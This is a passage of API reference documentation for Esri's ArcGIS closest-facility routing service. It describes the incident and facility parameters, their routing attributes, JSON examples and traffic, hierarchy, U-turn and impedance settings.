The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system. • attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field. Attributes for incidents When specifying the incidents using JSON structure, you can specify additional properties for incidents such as their names using attributes. The incidents parameter can be specified with the following attributes: • Name: The name of the incident. This name is used when generating driving directions. It is common to pass the actual name or street address for the incident as a value for Name attribute. If a value is not specified, an autogenerated name such as Location 1 or Location 2 is used for each incident. • CurbApproach: Specifies the direction a vehicle may arrive at and depart from the incident. One of the integers listed in Coded value column in the following table must be specified as a value of this attribute. The values in the Setting column are the descriptive names for CurbApproach attribute values that you might have come across when using ArcGIS Network Analyst extension software. SettingCoded valueDescription Either side of vehicle 0 The vehicle can approach and depart the incident in either direction, so a U-turn is allowed at the incident. This setting can be chosen if it is possible and desirable for your vehicle to turn around at the incident. This decision may depend on the width of the road and the amount of traffic or whether the incident has a parking lot where vehicles can pull in and turn around. Either side of vehicle All arrival and departure combinations are allowed with the Either side of vehicle curb approach. Right side of vehicle 1 When the vehicle approaches and departs the incident, the incident must be on the right side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the right hand side. Right side of vehicle The allowed arrival and departure combination for the Right side of vehicle curb approach. Left side of vehicle 2 When the vehicle approaches and departs the incident, the incident must be on the left side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the left hand side. Left side of vehicle The allowed arrival and departure combination for the Left side of vehicle curb approach. No U-Turn 3 When the vehicle approaches the incident, the incident can be on either side of the vehicle; however, when it departs, the vehicle must continue in the same direction it arrived in. A U-turn is prohibited. No U-turns The allowed arrival and departure combinations for the No U-Turn curb approach. The CurbApproach property was designed to work with both kinds of national driving standards: right-hand traffic (United States) and left-hand traffic (United Kingdom). First, consider an incident on the left side of a vehicle. It is always on the left side regardless of whether the vehicle travels on the left or right half of the road. What may change with national driving standards is your decision to approach from the right or left side. For example, if you want to arrive at an incident and not have a lane of traffic between the vehicle and the incident, you would choose Right side of vehicle in the United States but Left side of vehicle in the United Kingdom. Right side of vehicle with right-hand traffic. With right-hand traffic, the curb approach that leaves the vehicle closest to the incident is Right side of vehicle. Left side of vehicle with left-hand traffic With left-hand traffic, the curb approach that leaves the vehicle closest to the incident is Left side of vehicle. • Attr_TravelTime: Specifies the amount of time for cars, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to model the time spent at the incident. For example, if you are finding the three closest fire stations from a fire incident, the attribute can store the amount of time spent at the fire incident. This could be the time it takes for firefighters to hook up their equipment and begin fighting the fire. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the incident requires no service time. The default value is 0. • Attr_TruckTravelTime: Specifies the amount of time for trucks, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to model the time spent at the incident. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the incident requires no service time. The default value is 0. • Attr_WalkTime: Specifies the amount of time for pedestrians, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to model the time spent at the incident. The value for this attribute is included in the total travel time for the route and is also displayed in walking directions as service time. A zero or null value indicates that the incident requires no service time. The default value is 0. • Attr_Miles: Specifies the distance in miles that will be added to the total distance of the route between the incident and the closest facility. Generally the locations of the incidents are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual incident location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0. • Attr_Kilometers: Specifies the distance in kilometers that will added to the total distance of the route between the incident and the closest facility. Generally the locations of the incidents are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual incident location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0. • Cutoff_TravelTime: Specify the travel time for cars, in minutes, at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_TravelTime is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TravelTime attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_TruckTravelTime: Specify the travel time for trucks, in minutes, at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_TruckTravelTime is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TruckTravelTime attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_WalkTime: Specify the travel time for pedestrians, in minutes, at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_WalkTime is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_WalkTime attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_Miles: Specify the travel distance in miles at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_Miles is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_Miles attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_Kilometers: Specify the travel distance in kilometers at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_Kilometers is not set for an incident, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_Kilometers attribute allows the ability to overwrite the defaultCutoff value on a per incident basis. The default value for this attribute is null which indicates not to use any cutoff. • TargetFacilityCount: Specify the number of facilities that need to be found for the incident. If TargetFacilityCount is not set for an incident, the service will use the value specified as the defaultTargetFacilityCount parameter. The value for the TargetFacilityCount attribute allows the ability to overwrite the defaultTargetFacilityCount value on a per incident basis. The default value for this attribute is null which causes the service to use the value set for the defaultTargetFacilityCount parameter. If the TargetFacilityCount attribute is set to a value other than null, the defaultTargetFacilityCount value is overwritten. • Bearing: Specifies the direction the vehicle or person is moving in. Bearing is measured clockwise from true north and must be in degrees. Typically, values are between 0 and 360; however, negative values are interpreted by subtracting them from 360 degrees. • BearingTol: Short for bearing tolerance, this field specifies the maximum acceptable difference between the heading of a vehicle and a tangent line from the point on a street where Network Analyst attempts to locate the vehicle. The bearing tolerance is used to determine whether the direction in which a vehicle is moving generally aligns with the underlying road. If they align within the given tolerance, the vehicle is located on that edge; if not, the next nearest eligible edge is evaluated. Syntax for specifying incidents using JSON structure for features { "features": [ { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ], } Example 1: Specifying incident geometries and attributes using JSON structure The example also shows how to specify the Name attribute for each incident and specify a service time for each incident using the Attr_TraveTime attribute. The geometries for incidents are in the default spatial reference, WGS84, and hence the spatialReference property is not required within the geometry property. { "features": [ { "geometry": { "x": -122.4079, "y": 37.78356 }, "attributes": { "Name": "Fire Incident 1", "Attr_TravelTime": 4 } }, { "geometry": { "x": -122.404, "y": 37.782 }, "attributes": { "Name": "Crime Incident 45", "Attr_TravelTime": 5 } } ] } Example 2: Specifying incident geometries in Web Mercator spatial reference using JSON structure. The example also shows how to specify the Name attribute for each incident and specify the distance in miles between the actual incident location and its location on the street using the Attr_Miles attribute. The incident geometries are in the Web Mercator spatial reference and not in the default WGS84 spatial reference. Hence the spatialReference property is required within the geometry property. { "features": [ { "geometry": { "x": -13635398.9398, "y": 4544699.034400001, "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "123 Main St", "Attr_Miles": 0.29 } }, { "geometry": { "x": -13632733.3441, "y": 4547651.028300002, "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "845 Mulberry St", "Attr_Miles" : 0.31 } } ] } Syntax for specifying incidents using URL returning a JSON response { "url": "<url>" } Example 3: Specifying incidents using URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified. { "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/1/query?where=1%3D1&outFields=Name,RouteName&f=json" } facilities Use this parameter to specify one or more locations that are searched for when finding the closest location. These locations are referred to as facilities. Caution: The service imposes a limit of 100 points that can be passed as facilities. If the value is exceeded, the response returns an error message. You can use a simple comma- and semicolon-based syntax if you need to specify only facility point geometries in the default spatial reference WGS84 such as the longitude and latitude values. Simple syntax for facilities facilities=x1,y1; x2, y2; ...; xn, yn Example using simple syntax facilities=-117.1957,34.0564; -117.184,34.0546 You can specify facility geometries as well as attributes using a more comprehensive JSON structure that represents a set of features. The JSON structure can include the following properties: • url: Specify a REST query request to any ArcGIS Server feature, map, or geoprocessing service that returns a JSON feature set. This property is optional. However either features or url property must be specified. • features: Specify an array of features. This property is optional. However, either the features or the url property must be specified. Each feature in the features array represents an facility and contains the following properties: • geometry: Specifies the facility geometry as a point containing x and y properties along with a spatialReference property. The spatialReference property is not required if the coordinate values are in the default spatial reference WGS84. If the coordinate values are in a different spatial reference, you need to specify the well-known ID (WKID) for the spatial reference. You can find the WKID for your spatial reference depending on whether the coordinates are represented in a geographic coordinate system or a projected coordinate system. • attributes: Specify each attribute as a key-value pair where the key is the name of a given field, and the value is the attribute value for the corresponding field. Attributes for facilities When specifying the stops using JSON structure, you can specify additional properties for facilities such as their names using attributes. The facilities parameter can be specified with the following attributes: • Name: The name of the facility. This name is used when generating driving directions. It is common to pass the actual name or street address for the facility as a value for Name attribute. If a value is not specified, an autogenerated name such as Location 1 or Location 2 is used for each facility. • CurbApproach: Specifies the direction a vehicle may arrive at and depart from the facility. One of the integers listed in Coded value column in the following table must be specified as a value of this attribute. The values in the Setting column are the descriptive names for CurbApproach attribute values that you might have come across when using ArcGIS Network Analyst extension software. SettingCoded valueDescription Either side of vehicle 0 The vehicle can approach and depart the facility in either direction, so a U-turn is allowed at the facility. This setting can be chosen if it is possible and desirable for your vehicle to turn around at the facility. This decision may depend on the width of the road and the amount of traffic or whether the facility has a parking lot where vehicles can pull in and turn around. Either side of vehicle All arrival and departure combinations are allowed with the Either side of vehicle curb approach. Right side of vehicle 1 When the vehicle approaches and departs the facility, the facility must be on the right side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the right hand side. Right side of vehicle The allowed arrival and departure combination for the Right side of vehicle curb approach. Left side of vehicle 2 When the vehicle approaches and departs the facility, the facility must be on the left side of the vehicle. A U-turn is prohibited. This is typically used for vehicles like busses that must arrive with the bus stop on the left hand side. Left side of vehicle The allowed arrival and departure combination for the Left side of vehicle curb approach. No U-Turn 3 When the vehicle approaches the facility, the facility can be on either side of the vehicle; however, when it departs, the vehicle must continue in the same direction it arrived in. A U-turn is prohibited. No U-turns The allowed arrival and departure combinations for the No U-Turn curb approach. The CurbApproach property was designed to work with both kinds of national driving standards: right-hand traffic (United States) and left-hand traffic (United Kingdom). First, consider a facility on the left side of a vehicle. It is always on the left side regardless of whether the vehicle travels on the left or right half of the road. What may change with national driving standards is your decision to approach from the right or left side. For example, if you want to arrive at a facility and not have a lane of traffic between the vehicle and the facility, you would choose Right side of vehicle in the United States but Left side of vehicle in the United Kingdom. Right side of vehicle with right-hand traffic. With right-hand traffic, the curb approach that leaves the vehicle closest to the facility is Right side of vehicle. Left side of vehicle with left-hand traffic With left-hand traffic, the curb approach that leaves the vehicle closest to the facility is Left side of vehicle. • Attr_TravelTime: Specifies the amount of time for cars, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The attribute value can be used to specify the turnout time for the facility. For example, when finding the three closest fire stations from a fire incident, this attribute can be used to store the time it takes a crew to don the appropriate protective equipment and exit the fire station. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the facility requires no service time. The default value is 0. • Attr_TruckTravelTime: Specifies the amount of time for trucks, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The value for this attribute is included in the total travel time for the route and is also displayed in driving directions as service time. A zero or null value indicates that the facility requires no service time. The default value is 0. • Attr_WalkTime: Specifies the amount of time for pedestrians, in minutes, that will be added to the total travel time of the route between the incident and the closest facility. The value for this attribute is included in the total travel time for the route and is also displayed in walking directions as service time. A zero or null value indicates that the facility requires no service time. The default value is 0. • Attr_Miles: Specifies the distance in miles that will added to the total distance of the route between the incident and the closest facility. Generally the locations of the facilities are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual facility location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0. • Attr_Kilometers: Specifies the distance in kilometers that will added to the total distance of the route between the incident and the closest facility. Generally the locations of the facilities are not exactly on the streets but are set back somewhat from the road. This attribute value can be used to model the distance between the actual facility location and its location on the street if it is important to include that distance in the total travel distance. The default value is 0. • Cutoff_TravelTime: Specify the travel time for cars, in minutes, at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_TravelTime is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TravelTime attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_TruckTravelTime: Specify the travel time for trucks, in minutes, at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_TruckTravelTime is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_TruckTravelTime attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_WalkTime: Specify the travel time for trucks, in minutes, at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_WalkTime is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_WalkTime attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_Miles: Specify the travel distance in miles at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_Miles is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_Miles attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null which indicates not to use any cutoff. • Cutoff_Kilometers: Specify the travel distance in kilometers at which to stop searching for facilities for a given incident. Any incident beyond the cutoff value will not be searched. If Cutoff_Kilometers is not set for a facility, the service will use the value specified as the defaultCutoff parameter. The value for the Cutoff_Kilometers attribute allows the ability to overwrite the defaultCutoff value on a per facility basis. The default value for this attribute is null which indicates not to use any cutoff. • Bearing: Specifies the direction the vehicle or person is moving in. Bearing is measured clockwise from true north and must be in degrees. Typically, values are between 0 and 360; however, negative values are interpreted by subtracting them from 360 degrees. • BearingTol: Short for bearing tolerance, this field specifies the maximum acceptable difference between the heading of a vehicle and a tangent line from the point on a street where Network Analyst attempts to locate the vehicle. The bearing tolerance is used to determine whether the direction in which a vehicle is moving generally aligns with the underlying road. If they align within the given tolerance, the vehicle is located on that edge; if not, the next nearest eligible edge is evaluated. Syntax for specifying facilities using JSON structure for features { "features": [ { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value11>, "<field2>": <value12> } }, { "geometry": { "x": <x>, "y": <y>, "spatialReference": { "wkid": <wkid>, "latestWkid": <wkid>, } }, "attributes": { "<field1>": <value21>, "<field2>": <value22> } } ], } Example 1: Specifying facility geometries and attributes using JSON structure The example also shows how to specify the Name attribute for each facility and specify a service time for each facility using the Attr_TraveTime attribute. The geometries for facilities are in the default spatial reference, WGS84, and hence the spatialReference property is not required within the geometry property. { "features": [ { "geometry": { "x": -122.4079, "y": 37.78356 }, "attributes": { "Name": "Fire Station 34", "Attr_TravelTime": 4 } }, { "geometry": { "x": -122.404, "y": 37.782 }, "attributes": { "Name": "Fire Station 29", "Attr_TravelTime": 5 } } ] } Example 2: Specifying facility geometries in Web Mercator spatial reference using JSON structure. The example also shows how to specify the Name attribute for each facility and specify the distance in miles between the actual facility location and its location on the street using the Attr_Miles attribute. The facility geometries are in the Web Mercator spatial reference and not in the default WGS84 spatial reference. Hence the spatialReference property is required within the geometry property. { "features": [ { "geometry": { "x": -13635398.9398, "y": 4544699.034400001, "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "Store 45", "Attr_Miles": 0.29 } }, { "geometry": { "x": -13632733.3441, "y": 4547651.028300002, "spatialReference": { "wkid": 102100 } }, "attributes": { "Name": "Store 67", "Attr_Miles" : 0.31 } } ] } Syntax for specifying facilities using URL returning a JSON response { "url": "<url>" } Example 3: Specifying facilities using URL. The URL makes a query for a few features from a map service. A URL querying features from a feature service can also be specified. { "url": "http://sampleserver3.arcgisonline.com/ArcGIS/rest/services/Network/USA/MapServer/1/query?where=1%3D1&outFields=Name,RouteName&f=json" } returnCFRoutes Use this parameter to specify if the service should return routes. • true—Routes are generated. The routes are available in the routes property of the JSON response. The shape of the routes depends on the value for the outputLines parameter. • false—Routes are not generated. Caution: The default value for the returnCFRoutes parameter is false. In order to get the best routes between the incident and the closest facilities, this parameter should be specified as true. If you also want the service to return the point features representing the closest facilities from the incidents, you should specify the returnFacilities parameter as true Tip: You may not want to return routes if your application has to display only the driving directions between the stops. It is sufficient in this case to set the returnDirections parameter to true; returning routes will not provide any additional information and will increase the overall response size. token Use this parameter to specify a token that provides the identity of a user that has the permissions to access the service. Accessing services provided by Esri provides more information on how such an access token can be obtained. f Use this parameter to specify the response format. Choose either json or pjson, for example, f=json. The pjson value is used for printing the JSON response in a pretty format. Optional parameters travelMode Choose the mode of transportation for the analysis. Travel modes are managed in ArcGIS Online and can be configured by the administrator of your organization to better reflect your organization's workflows. You need to specify the JSON object containing the settings for a travel mode supported by your organization. To get a list of supported travel modes, execute the GetTravelModes tool from the Utilities service. The value for the travelMode parameter should be a JSON object representing travel mode settings. When you use the GetTravelModes tool from the Utlities service, You get a string representing the travel mode JSON. You need to convert this string to a valid JSON object using your API and then pass the JSON object as the value for the travelMode parameter. For example, below is a string representating the Walking Time travel mode as returned by the GetTravelModes tool. "{\"attributeParameterValues\": [{\"parameterName\": \"Restriction Usage\", \"attributeName\": \"Walking\", \"value\": \"PROHIBITED\"}, {\"parameterName\": \"Restriction Usage\", \"attributeName\": \"Preferred for Pedestrians\", \"value\": \"PREFER_LOW\"}, {\"parameterName\": \"Walking Speed (km/h)\", \"attributeName\": \"WalkTime\", \"value\": 5}], \"description\": \"Follows paths and roads that allow pedestrian traffic and finds solutions that optimize travel time. The walking speed is set to 5 kilometers per hour.\", \"impedanceAttributeName\": \"WalkTime\", \"simplificationToleranceUnits\": \"esriMeters\", \"uturnAtJunctions\": \"esriNFSBAllowBacktrack\", \"restrictionAttributeNames\": [\"Preferred for Pedestrians\", \"Walking\"], \"useHierarchy\": false, \"simplificationTolerance\": 2, \"timeAttributeName\": \"WalkTime\", \"distanceAttributeName\": \"Miles\", \"type\": \"WALK\", \"id\": \"caFAgoThrvUpkFBW\", \"name\": \"Walking Time\"}" The above value should be converted to a valid JSON object and passed as the value for the travelMode parameter travelMode={"attributeParameterValues":[{"parameterName":"Restriction Usage","attributeName":"Walking","value":"PROHIBITED"},{"parameterName":"Restriction Usage","attributeName":"Preferred for Pedestrians","value":"PREFER_LOW"},{"parameterName":"Walking Speed (km/h)","attributeName":"WalkTime","value":5}],"description":"Follows paths and roads that allow pedestrian traffic and finds solutions that optimize travel time. The walking speed is set to 5 kilometers per hour.","impedanceAttributeName":"WalkTime","simplificationToleranceUnits":"esriMeters","uturnAtJunctions":"esriNFSBAllowBacktrack","restrictionAttributeNames":["Preferred for Pedestrians","Walking"],"useHierarchy":false,"simplificationTolerance":2,"timeAttributeName":"WalkTime","distanceAttributeName":"Miles","type":"WALK","id":"caFAgoThrvUpkFBW","name":"Walking Time"} Caution: When the travelMode parameter is set, you are choosing a travel mode configured in your organization, and the service automatically overrides the values of other parameters with values that model the chosen travel mode. The following parameters are overridden: impedanceAttributeName, attributeParameterValues, restrictUturns, useHierarchy, restrictionAttributeNames, outputGeometryPrecision, outputGeometryPrecisionUnits, and directionsTimeAttributeName. If you don't set travelMode, the service honors the default or user-defined values for the parameters that would otherwise be overridden, so you can create your own travel mode. defaultTargetFacilityCount The service can be used to find multiple closest facilities from an incident. Use this parameter to specify the number of closest facilities to find per incident. This is useful in situations, such as a fire, where multiple fire engines may be required from different fire stations. The service can find, for example, the three nearest fire stations to a fire. Caution: The service imposes a maximum limit of 10 facilities to find from each incident. The value for the defaultTargetFacilityCount parameter can be overwritten on a per incident basis by specifying a value for the TargetFacilityCount attribute when specifying the incidents parameter. travelDirection Use this parameter to specify whether you want to search for the closest facility as measured from the incident to the facility or from the facility to the incident. The parameter can be specified using the following values: • esriNATravelDirectionFromFacility: Direction of travel is from facilities to incidents. • esriNATravelDirectionToFacility: Direction of travel is from incidents to facilities. Using one of the parameter value can find different facilities as the travel time along some streets may vary based on the travel direction and oneway restrictions. For instance, a facility may be a 10-minute drive from the incident while traveling from the incident to the facility, but while traveling from the facility to the incident, it may be a 15-minute journey because of different travel time in that direction. Fire departments commonly use the esriNATravelDirectionFromFacility value for the parameter since they are concerned with the time it takes to travel from the fire station (facility) to the location of the emergency (incident). A retail store (facility) is more concerned with the time it takes the shoppers (incidents) to reach the store; therefore, stores commonly use the esriNATravelDirectionToFacility parameter value. The default value for this parameter is esriNATravelDirectionToFacility. defaultCutoff Use this parameter to specify the travel time or travel distance value at which to stop searching for facilities for a given incident. For instance, while finding the closest hospitals from the site of an accident, a cutoff value of 15 minutes would mean that the service would search for the closest hospital within 15 minutes from the incident. If the closest hospital is 17 minutes away, no routes will be returned in the output routes. A cutoff value is especially useful when searching for multiple facilities. The units for this parameter is based on the value of the impedanceAttributeName parameter. If impedanceAttributeName parameter is TravelTime, the defaultCutoff is specified in minutes. Otherwise the value is specified in miles or kilometers based on whether the impedanceAttributeName is set to Miles or Kilometers respectively. The default value for this parameter is null which indicates not to use any cutoff. The value for the defaultCutoff parameter can be overwritten on a per incident or facility basis by specifying a value for the Cutoff_TravelTime, Cutoff_Miles, or Cutoff_Kilometers attributes when specifying the incidents or the facilities parameter. timeOfDay Specify whether travel times should consider traffic conditions. To use traffic in the analysis, set impedanceAttributeName to TravelTime, and assign a value to timeOfDay. The timeOfDay value indicates the target start time of the routes in the analysis. If timeOfDayUsage is set to esriNATimeOfDayUseAsEndTime, the value represents when the routes should arrive at their nearby locations. The time is specified as Unix time (milliseconds since midnight, January 1 1970). If a time of day is not passed in, the service uses static road speeds based on average historical speeds or posted speed limits. It uses posted speeds in areas where historical traffic information isn't available. Note: Traffic is supported only with the driving time impedance or travel mode. It's not supported with trucking. The service supports two kinds of traffic: typical and live. Typical traffic references travel speeds that are made up of historical averages for each five-minute interval spanning a week. Live traffic retrieves speeds from a traffic feed that processes phone probe records, sensors, and other data sources to record actual travel speeds and predict speeds for the near future. The Data Coverage page shows the countries Esri currently provides traffic data for. Typical Traffic: To ensure the task uses typical traffic in locations where it is available, choose a time and day of the week, and then convert the day of the week to one of the following dates from 1990: • Monday—1/1/1990 • Tuesday—1/2/1990 • Wednesday—1/3/1990 • Thursday—1/4/1990 • Friday—1/5/1990 • Saturday—1/6/1990 • Sunday—1/7/1990 Set the time and date as Unix time in milliseconds. For example, to solve for 1:03 p.m. on Thursdays, set the time and date to 1:03 p.m., 4 January 1990; and convert to milliseconds (631458180000). Note: • The default value is null, which means the effect of changing traffic isn't included in the analysis. • Although the dates representing days of the week are from 1990, typical traffic is calculated from recent traffic trends—usually over the last several months. • This parameter is ignored when impedanceAttributeName is set to distance units. • The time zone for timeOfDay can be UTC or the time zone or zones in which the points in facilities or incidents are located. Specify time zones with the timeOfDayIsUTC parameter. • All incidents must be in the same time zone when • Specifying a start time and traveling from incident to facility • Specifying an end time and traveling from facility to incident • All facilities must be in the same time zone when • Specifying a start time and traveling from facility to incident • Specifying an end time and traveling from incident to facility Examples: • "timeOfDay": 631458180000 // 13:03, 4 January 1990. Typical traffic on Thursdays at 1:03 p.m. • "timeOfDay": 631731600000 // 17:00, 7 January 1990. Typical traffic on Sundays at 5:00 p.m. • "timeOfDay": 1413964800000 // 8:00, 22 October 2014. If the current time is between 8:00 p.m., 21 Oct. 2014 and 8:00 p.m., 22 Oct. 2014, live traffic speeds are referenced in the analysis; otherwise, typical traffic speeds are referenced. • "timeOfDay": 1426674000000 // 10:20, 18 March 2015. If the current time is between 10:20 p.m., 17 Mar. 2015 and 10:20 p.m., 18 Mar. 2015, live traffic speeds are referenced in the analysis; otherwise, typical traffic speeds are referenced. timeOfDayIsUTC Specify the time zone or zones of the timeOfDay parameter. There are two options: false (default) and true. false (use geographically local time zones): The timeOfDay value refers to the time zone in which the input facilities or incidents are located. If the travelDirection and timeOfDayUsage parameters indicate a departure or arrival time at the facilities, timeOfDay refers to the time zone of the facilities. Likewise, if the two parameters indicate a departure or arrival time at the incidents, timeOfDay refers to the time zone of incidents. Illustration of setting the value to false (geographically local): Setting timeOfDay to 9:00 a.m., 4 January 1990 (631443600000 milliseconds); timeOfDayIsUTC to false; and submitting a valid request causes the drive times for points in the Eastern Time Zone to start at 9:00 a.m. (2:00 p.m. UTC). true (use UTC): The timeOfDay value refers to Coordinated Universal Time (UTC). UTC Illustration: Setting timeOfDay to 9:00 a.m., 4 January 1990 (631443600000 milliseconds) and timeOfDayIsUTC to true, the start time for points in the Eastern Time Zone is 4:00 a.m. Eastern Time (9:00 a.m. UTC). Note: • This parameter is ignored when impedanceAttributeName is set to distance units. • All incidents must be in the same time zone when • Specifying a start time and traveling from incident to facility • Specifying an end time and traveling from facility to incident • All facilities must be in the same time zone when • Specifying a start time and traveling from facility to incident • Specifying an end time and traveling from incident to facility timeOfDayUsage Use this parameter to specify whether the timeOfDay parameter value represents the arrival or departure time for the routes. The parameter can be specified using the following values: • esriNATimeOfDayUseAsStartTime: When this value is specified, the service finds the best route considering the timeOfDay parameter value as the departure time from the facility or incident. • esriNATimeOfDayUseAsEndTime: When this value is specified, the service considers the timeOfDay parameter value as the arrival time at the facility or incident. This value is useful if you want to know what time to depart from a location so that you arrive at the destination at the time specified in timeOfDay. The default value for this parameter is esriNATimeOfDayUseAsStartTime. The parameter value is ignored if the timeOfDay parameter has none value. useHierarchy Specify whether hierarchy should be used when finding the shortest paths. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. • true (default)—Use hierarchy when measuring between points. When hierarchy is used, the tool prefers higher-order streets (such as freeways) to lower-order streets (such as local roads), and can be used to simulate the driver preference of traveling on freeways instead of local roads even if that means a longer trip. This is especially true when finding routes to faraway locations, because drivers on long-distance trips tend to prefer traveling on freeways where stops, intersections, and turns can be avoided. Using hierarchy is computationally faster, especially for long-distance routes, since the tool can determine the best route from a relatively smaller subset of streets. • false—Do not use hierarchy when measuring between stops. If hierarchy is not used, the tool considers all the streets and doesn't prefer higher-order streets when finding the route. This is often used when finding short-distance routes within a city. Caution: The service automatically reverts to using hierarchy if the straight-line distance between the stops is greater than 50 miles (80.46 kilometers), even if you have specified to find the route without using hierarchy. restrictUTurns Use this parameter to restrict or permit the route from making U-turns at junctions. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. In order to understand the available parameter values, consider for a moment that a junction is a point where only two streets intersect each other. If three or more streets intersect at a point, it is called as an intersection. A cul-de-sac is a dead-end. The parameter can have the following values: Parameter ValueDescription esriNFSBAllowBacktrack (default) U-turns are permitted everywhere. Allowing U-turns implies that the vehicle can turn around at a junction and double back on the same street. U-turns are allowed U-turns are permitted at junctions with any number of adjacent streets. esriNFSBAtDeadEndsAndIntersections U-turns are prohibited at junctions where exactly two adjacent streets meet. U-turns allowed only at intersections and dead-ends U-turns are permitted only at intersections or dead ends. esriNFSBAtDeadEndsOnly U-turns are prohibited at all junctions and interesections and are permitted only at dead ends. U-turns allowed only at dead-ends U-turns are permitted only at dead ends. esriNFSBNoBacktrack U-turns are prohibited at all junctions, intersections, and dead-ends. Note that even when this parameter value is chosen, a route can still make U-turns at stops. If you wish to prohibit U-turns at a stop, you can set its CurbApproach property to the appropriate value (3). impedanceAttributeName Specify the impedance. Caution: The value of this parameter, regardless of whether you rely on the default or explicitly set a value, is overridden when you pass in travelMode. Impedance is a value that quantifies travel along the transportation network. Travel distance is an example of impedance; it quantifies the length of walkways and road segments. Similarly, drive time—the typical time it takes to drive a car along a road segment—is an example of impedance. Drive times may vary by type of vehicle—for instance, the time it takes for a truck to travel along a path tends to be longer than a car—so there can be many impedance values representing travel times for different vehicle types. Impedance values may also vary with time; live and historical traffic reference dynamic impedance values. Each walkway and road segment stores at least one impedance value. When performing a network analysis, the impedance values are used to calculate the best results, such as finding the shortest route—the route that minimizes impedance—between two points. The impedance parameter can be specified using the following values: • TravelTime (default)—Models travel times for a car. These travel times can be dynamic, fluctuating according to traffic flows, in areas where traffic data is available. • TruckTravelTime—Models travel times for a truck. These travel times are static for each road and don't fluctuate with traffic. • WalkTime—Models travel times for a pedestrian. The default walking speed is 5 kilometers per hour (3.1 miles per hour), but you can change that speed through the attributeParameterValues parameter by setting Walking Speed (km/h) to a different value. • Miles—Specifies that the travel distance between the stops should be minimized. The total distance between the stops is calculated in miles. • Kilometers—Specifies that the travel distance between the stops should be minimized. The total distance between the stops is calculated in kilometers. accumulateAttributeNames Use this parameter to specify whether the service should accumulate values other than the value specified for impedanceAttributeName. For example, if your impedanceAttributeName is set to TravelTime, the total travel time for the route will be calculated by the service. However, if you also want to calculate the total distance of the route in miles, you can specify Miles as the value for the accumulateAttributeNames parameter. The 